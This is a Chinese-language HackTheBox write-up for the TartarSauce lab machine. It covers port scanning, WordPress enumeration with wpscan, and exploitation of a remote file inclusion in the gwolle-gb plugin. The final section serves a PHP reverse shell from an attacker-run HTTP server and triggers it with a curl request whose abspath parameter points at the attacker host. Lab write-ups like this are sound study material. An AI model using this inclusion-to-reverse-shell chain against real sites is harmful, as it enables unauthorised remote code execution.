勘探
nmap直接扫
root@kali:~/hackthebox/tartarsauce-10.10.10.88# nmap 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 12:21 EDT
Warning: 10.10.10.88 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.88
Host is up (0.098s latency).
Not shown: 65467 closed ports, 67 filtered ports
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 26.34 seconds
root@kali:~/hackthebox/tartarsauce-10.10.10.88# nmap -sCV -p 80 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 12:25 EDT
Nmap scan report for 10.10.10.88
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.70 seconds
发现是一个完全的web,那么用dirsearch扫
80端口勘探
dirsearch可以发现这个网页中有robots.txt文件
指定了五个目录,不过,那五个都是兔子洞,我在那几个界面浪费了大量的时间。。。
但同时他也暴漏了一个地址/webservice
对这个地址用gobuster中字典爆破发现有/wp目录那是不是代表他有wordpress啊
既然有wp那么我们做进一步的探查
wpscan --url http://tartarsauce.htb/webservices/wp/
wpscan --url http://tartarsauce.htb/webservices/wp/ --enumerate p,t,u
wpscan --url http://tartarsauce.htb/webservices/wp --enumerate p --plugins-detection aggressive
这里作者用欺骗的方式,将wp版本更改成了2的版本,但其实还是1.5,所以wpscan要用aggressive模式
这一点,可以在插件的一个readme中找到
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
...
[+] We found 3 plugins:
[+] Name: akismet - v4.0.3
| Last updated: 2018-05-26T17:14:00.000Z
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
[!] The version is out of date, the latest version is 4.0.6
[+] Name: brute-force-login-protection - v1.5.3
| Latest version: 1.5.3 (up to date)
| Last updated: 2017-06-29T10:39:00.000Z
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
[+] Name: gwolle-gb - v2.3.10
| Last updated: 2018-05-12T10:06:00.000Z
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
[!] The version is out of date, the latest version is 2.5.2
[+] Enumerating installed themes (only ones marked as popular) ...
...
提权至www-date
那么我们发发现有gwolle可以试一试gwolle的跨域文件包含
具体实现步骤是这样的(其实在searchspolit中可以看到漏洞作者写的exp)
1.用python打开一个微服务
python -m SimpleHTTPServer 12345
注意,你命令行打开的位置就是这个服务共享的位置
2.在分享的文件夹中创建一个回连shell脚本命名为wp-load.php,我使用的是/usr/share/webshells/php/php-reverse-shell.php这个msf的脚本,注意修改脚本内的host和port
注意为什么叫这个名字,其实是为了方便
└─# python -m SimpleHTTPServer 12345 1 ⨯
Serving HTTP on 0.0.0.0 port 12345 ...
10.10.10.88 - - [28/Dec/2021 19:38:11] "GET /wp-load.php HTTP/1.0" 200 -
10.10.10.88 - - [28/Dec/2021 20:07:40] "GET /b.sh HTTP/1.1" 200 -
连接测试的时候发现这个跨域访问会直接连接这个文件,所以这样不用加文件名
3.打开nc监听
4.用curl访问链接或者直接浏览器访问
curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.3:12345/
注意,端口改自己脚本中的端口,地址的端口最后必须加